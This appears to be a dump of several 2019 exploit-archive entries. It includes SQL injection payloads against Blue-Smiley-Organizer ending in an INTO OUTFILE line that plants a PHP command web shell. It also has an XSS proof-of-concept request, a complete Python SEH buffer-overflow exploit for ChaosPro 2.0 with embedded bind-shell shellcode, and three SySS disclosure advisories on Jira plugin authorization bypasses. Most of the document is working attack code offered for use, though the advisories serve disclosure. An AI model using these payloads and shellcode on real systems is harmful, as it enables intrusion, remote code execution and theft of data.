Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
Version: 1.32
Tested on: CentOS7
CVE : N/A

# PoC: Multiple SQL Injection vulnerabilities
# Nice and easy SQL Injection

Parameter: datetime (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
    Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])    


# Pop a PHP CMD Shell

' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -

Exploit Title: waldronmatt FullCalendar-BS4-PHP-MySQL-JSON 1.21 - 'description' Cross-Site Scripting
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON
Software Link: https://github.com/waldronmatt/FullCalendar-BS4-PHP-MySQL-JSON.git
Version: 1.21
Tested on: CentOS7
CVE : N/A

# Description:
# Cross-Site scripting vulnerability in the description field. This XSS completely breaks the web application.

#POC
POST /addEvent.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://10.0.0.20/calendar03/
Content-Type: application/x-www-form-urlencoded
Content-Length: 213
Cookie: PHPSESSID=t41kk4huqaluhcfghvqqvucl56
Connection: close
Upgrade-Insecure-Requests: 1
DNT: 1

title=%3Cscript%3Ealert%28%22TEST-Title%22%29%3B%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%22TEST-Description%22%29%3B%3C%2Fscript%3E&color=%230071c5&start=2019-01-23+00%3A00%3A00&end=2019-01-24+00%3A00%3A00

# Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
# Date: 2019-10-27
# Exploit Author: Chase Hatch (SYANiDE)
# Vendor Homepage: http://www.chaospro.de/
# Software link: http://www.chaospro.de/cpro20.zip
# Version: 2.0
# Tested on: Windows XP Pro OEM

#!/usr/bin/env python2
import os, sys


# sploit = "A"* 5000  ## Crash! 41414141 in SEH! via ProfilePath or PicturePath.  Windows XP OEM
# `locate pattern_create.rb | head -n 1` 5000  #  326d4431
# `locate pattern_offset.rb | head -n 1` 326d4431 5000  #  2705
# sploit = "A" * (2705 -  4 - 126)  # 2575
# sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
# `locate pattern_offset.rb|head -n 1` 61413561 2575
# 16


################ Second stage ####################
sploit = "A"*16
#  msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
#, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
sploit += (
"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
"\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
"\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
"\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
"\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
"\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
"\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
"\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
"\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
"\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
"\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
"\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
"\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
"\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
"\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
"\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
"\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
"\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
"\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
"\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
"\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
"\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
"\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
"\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
"\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
"\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
"\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
"\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
"\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
"\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
"\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
"\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
"\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
"\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
"\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
"\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
"\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
"\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
"\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
"\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
"\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
"\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
"\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
"\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
"\x6f\x39\x45\x41\x41"
) # 710 bytes
sploit += "A" * (2575 - 16 - 710)


################ First stage ####################

# ESP: 0012E75C
# ESP target: 0012FF98
## Need to align to four-byte and 16-byte boundaries:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
# 282.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
# 1551.0000
# echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
# 183C
# 0012FF32   54               PUSH ESP
# 0012FF33   58               POP EAX
# 0012FF34   66:05 3C18       ADD AX,183C
# 0012FF38   50               PUSH EAX
# 0012FF39   5C               POP ESP
sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8


# target instruction to push onto stack at new ESP:  FFE4 JMP ESP # 4141E4FF
# ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
#    0:25 28 28 28 28       and    eax,0x28282828
#    5:25 47 47 47 47       and    eax,0x47474747
#    a:2d 7f 01 7f 7f       sub    eax,0x7f7f017f
#    f:2d 7f 01 01 01       sub    eax,0x101017f
#   14:2d 03 18 3e 3e       sub    eax,0x3e3e1803
#   19:50                   push   eax
sploit += (
"\x25\x28\x28\x28\x28"
"\x25\x47\x47\x47\x47"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x7f\x01\x01\x01"
"\x2d\x03\x18\x3e\x3e"
"\x50"
) # 26 bytes

## Realign new ESP with beginning of overflow buffer:
## New ESP should be four-byte and 16-byte aligned:
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
# 122.0000
# echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
# 671.0000
# echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
# A7C
## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
# 0012FF54   44               INC ESP
# 0012FF55   44               INC ESP
# 0012FF56   44               INC ESP
# 0012FF57   44               INC ESP
# 0012FF58   44               INC ESP
# 0012FF59   44               INC ESP
# 0012FF5A   44               INC ESP
# 0012FF5B   44               INC ESP
sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8

## Going to have to carve out the address 0012F51C
# ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
#   0:25 02 02 02 02       and    eax,0x2020202
#   5:25 51 51 51 51       and    eax,0x51515151
#   a:2d 7f 01 7f 7f       sub    eax,0x7f7f017f
#   f:2d 01 01 01 61       sub    eax,0x61010101
#  14:2d 64 08 6d 1f       sub    eax,0x1f6d0864
#  19:50                   push   eax
sploit +=(
"\x25\x02\x02\x02\x02"
"\x25\x51\x51\x51\x51"
"\x2d\x7f\x01\x7f\x7f"
"\x2d\x01\x01\x01\x61"
"\x2d\x64\x08\x6d\x1f"
"\x50"
) # 26 bytes

## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
# 5C   POP ESP
sploit += "\x5c" # 1

sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)

################ RET from SEH: JMP SHORT - 126 ####################

sploit += "\xeb\x80" + "\x41\x41" # 4
# 00401B44  |. 5F             POP EDI
# 00401B45  |> 5E             POP ESI
# 00401B46  \. C3             RETN
sploit += "\x44\x1b\x40\x00"


################ build the config ####################
## Running from just outside base directory of ChaosPro:

def ret_cfg(inp):
# do it live in PicturePath
cfg = """PicturePath %s""" % inp
with open("chaospro\\ChaosPro.cfg",'w') as F:
F.write(cfg)
F.close()

ret_cfg(sploit)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-041
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: High
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16906
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a Plug-in that displays email notification
from Jira directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

With a Jira user name, the corresponding notifications can be read without authentication/authorization.
This notification is then no longer displayed to the normal user.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to see notifications for a specific user:
/plugins/servlet/nfj/PushNotification?username=<userName>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
    https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-041
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-041.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone
and Sascha Heider of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEZTiCFlVb++ceAX+9THl5zlMWMmgFAl2wTx4ACgkQTHl5zlMW
MmiiOg/+JCucgzsU1KS7J3jAcn6l3xYinHyLh7jxxdlrB/6NuepeigjFJH2LjG8g
QlBx9XDCMgr68K8VI54oOLF2OFPrnSHeF/zAIrtj6QrKq/g2V72OvRIJoHmIcDCP
zmrQzXmU9b2Z+kXW6nqOfObbIVVMDoLBPJ+d99VeYPz0hFlUB2wdk87PTB7GY621
OuI6UljIJAO6HYOleSvpUYiFtQwk02U2GAzJnz8YADdGt0iE34L2+rRvmJ6u6RB1
irmMBRwctAw+79DPPZSA3lx1BajyrfYizFRNntR1UFd62/NdsDwKA1QNidK8JTRb
+/XvyjmQl+ln/sFGelhZyXEBZQSmEUG+YdtvekXWqMMhD9UoEow1sGgYOQdSAHUQ
eov7+cn6NEdzloeSAvIbx8Ho4ZzLU8rP5+ucsvzJyk4sdr5RbMT6++xHDhTCTM9k
5njp5tiUZYOI1ebGgci3QMtixU9FtoQHccaqSCwVq5RYQuJ2xOpW1Z+UPrFlflNq
Mo2yLeYw1iCBskRoMFdWiWwsQOK7riV5NUam18sbwx1ua97Kgsf9rz+V3hJz1qGF
ifpGmxF5xOfhanLQZ37rgAVGvuBOky85+7BFJh+rqKymp0n/mopguxDg6mnzavwg
wknXNv1cFlgdsUUwTSpZjTnJ+fO7npEzTdfeSFVEk1HjiaJlQ94=
=Yt7r
-----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-042
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: Medium
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16908, CVE-2019-16909
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a Plug-in that displays email notification
from Jira directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to view all projects within Jira without authentication/authorization.
Furthermore it is possible to view all projects within Jira as a logged in user even
though no permission was granted to these projects.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to see all existing projects unauthenticated:
/plugins/servlet/nfj/ProjectFilter?searchQuery=

To see all projects authenticated, use the following path as logged in user:
/plugins/servlet/nfj/NotificationSettings

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
    https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-042
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-042.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone
and Sascha Heider of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEZTiCFlVb++ceAX+9THl5zlMWMmgFAl2wTyIACgkQTHl5zlMW
Mmj0kA/8CrIl1eTH1kYuWVN0NVqWpGw4TcbkpBLKicKdiVnGUOVEcrDCM+lOI2ZG
JmqmyheM0C1pGkfYaMGl7fqR2y4vgxfuUcv8Iz/U1HSAlZ+MqKaD32o6VW4DkobS
K3OFE5/seV/2YCszw7v+OAqxw9Lz0ewQyQ1xH8d+iH9SY6gATJNfyknIFOIM9YrZ
9Yax774gLgVhrs0nWXeGyCO8pd6lYV0yS0gJDpQrac/bRSCQ5IdImuoJQ+ASl1QC
Lx+H/MU1v3zjJ1nYKqdim+fhElWQxRe09S4myia0cRID5eN2Hxu+zHDiQF8POYt/
va3tfZblUsFZa9uI1z1IE1BuUsBmJuQqvasSHTIbFUO4EfIp0G9yBsPxyG4wCnzX
5wViCbbkBymX0Qronf0LvcNrY7+lovrGF2MtQLiQFXxs8UjcC5n3DqpVu9LISX/E
+VIRJhJjUsCQo1S01K061mXATOv1maIhFmwYeno6SyAJ2z6/uWJh/KF/+7Zcoa9G
LWjJDW9c3EfER7wRudLAYGiSol5O1tO/QZsNPFKXAivRgtWFG1uWPCssgNTN4qr5
Tqw9Er7OUipukoRRS87sduClUDMeFAn2UmJDTRes/hoftiPVTrEtPO/uH/9hCae4
6Fj7E4j7En0LjEau8vCEDd2Bebzb0bLUXEid528U5RwUqguNuuw=
=Rfgo
-----END PGP SIGNATURE-----

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512

Advisory ID: SYSS-2019-043
Product: In-App & Desktop Notification for Jira
Manufacturer: Infosysta
Affected Version(s): 1.6.13_J8
Tested Version(s): 1.6.13_J8
Vulnerability Type: Authentication/Authorization Bypass
Risk Level: Medium
Solution Status: Closed
Manufacturer Notification: 2019-09-24
Solution Date: 2019-10-01
Public Disclosure: 2019-10-23
CVE Reference: CVE-2019-16907
Author of Advisory:
Erik Steltzner, SySS GmbH
Fabian Krone, SySS GmbH
Sascha Heider, SySS GmbH

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

In-App & Desktop Notification for Jira is a Plug-in that displays email notification
from Jira directly within the application.

The manufacturer describes the product as follows (see [1]):

"In-app & Desktop Notifications for Jira app allows you to get all of Jira's
email notifications in front of you. Now you won't have to search through all
your emails to check for a specific event in Jira, but all what you need to do
is to check the notification section in Jira and see all events that happened
in Jira and are related to you.
You will also receive instant Desktop notifications as well as you will be able
to add comments to the tickets directly from the notification."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

It is possible to read out all user names within Jira without authentication/authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following path it is possible to list all existing user names:
/plugins/servlet/nfj/UserFilter?searchQuery=@

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Before delivering a reply, it should be checked whether a
request has the necessary authorization.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-09-10: Vulnerability discovered
2019-09-24: Vulnerability reported to manufacturer
2019-10-01: Patch released by manufacturer
2019-10-23: Public disclosure of vulnerability

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for In-App & Desktop Notification for Jira
    https://marketplace.atlassian.com/apps/1217434/in-app-desktop-notifications-for-jira
[2] SySS Security Advisory SYSS-2019-043
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-043.txt
[3] SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Erik Steltzner, Fabian Krone and Sascha Heider
of SySS GmbH.

E-Mail: erik.steltzner@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Erik_Steltzner.asc
Key ID: 0x4C7979CE53163268
Key Fingerprint: 6538 8216 555B FBE7 1E01 7FBD 4C79 79CE 5316 3268

E-Mail: fabian.krone@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Fabian_Krone.asc
Key ID: 0xBFDF30ABD10EA0F4
Key Fingerprint: 0ADE D2AA AE27 7DDA A8F0 C051 BFDF 30AB D10E A0F4

E-Mail: sascha.heider@syss.de
Public Key: ://www.syss.de/fileadmin/dokumente/PGPKeys/Sascha_Heider.asc
Key ID: 0x06C4F8D7FCE9AF94
Key Fingerprint: F99E 89B8 EF77 C34F 6F9F 0E19 06C4 F8D7 FCE9 AF94

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: https://creativecommons.org/licenses/by/3.0/deed.en

-----BEGIN PGP SIGNATURE-----

iQIzBAEBCgAdFiEEZTiCFlVb++ceAX+9THl5zlMWMmgFAl2wTyYACgkQTHl5zlMW
MmhNtg/+NAuoLbSdHSow25HiVL4eFstwd2Bnh4CWGba2/E0YNZ3DzD8/6cSCzr9s
5pOU9fTz3lyZHWh7r2Jg8IutTaPk3AHC6qHx8hvACqhqnpHhfejCHtqc6ROK2VRT
1vGCp3j7EqDN52e7lQZaDmNxAnhNu7CeCIKHIdzKnEkg4owlEI5JYwzwF8YogTqF
keiQjd/eVw9o2NFjy+b1+q2/UuAeuRZ1Rd/YZ8RyvLuG/lsT2oOCdikXnWN/AIDm
q8rQe8uiVoA9fjixsNWHCW6PcnwPtMwu3K/pFLmzh7n482J/VIzjBfngnnRgrHCG
/UvwUGG/UgXxiWUKbEoVrA3TeOfTybOWQ3+SHKyZdUBUmoIJBzZq5CdJRJMpne5U
0iY1qbFwZL5XVIhgfN16W3OOMp4cUk3mbT9OWTRg2S13pZpllONjM4E5+cIGpjwX
gTH7FzEVT8ywLEWN+m1ISA4LDCK9mXS+LM8s/RLLRcDibBaUdqCyb8UTxnVcaFtk
syO+dTMtIJNymvM+hpkRadMuKxaL5Rm7SOfjrpA7aQORlwFxM2NGrmNQcos7jUQL
Z2M8sinSq/Ht+SPbIwnxzE+z1Ve6xFBNgnT1PWu5MPOOCkM6Qo9f22EhVjTVS6Td
/BTiVKZPEG58O5oN8Oq8r3w6LX2i9wmUBAqAyGBFCMkQ5JLKA/U=
=mNrG
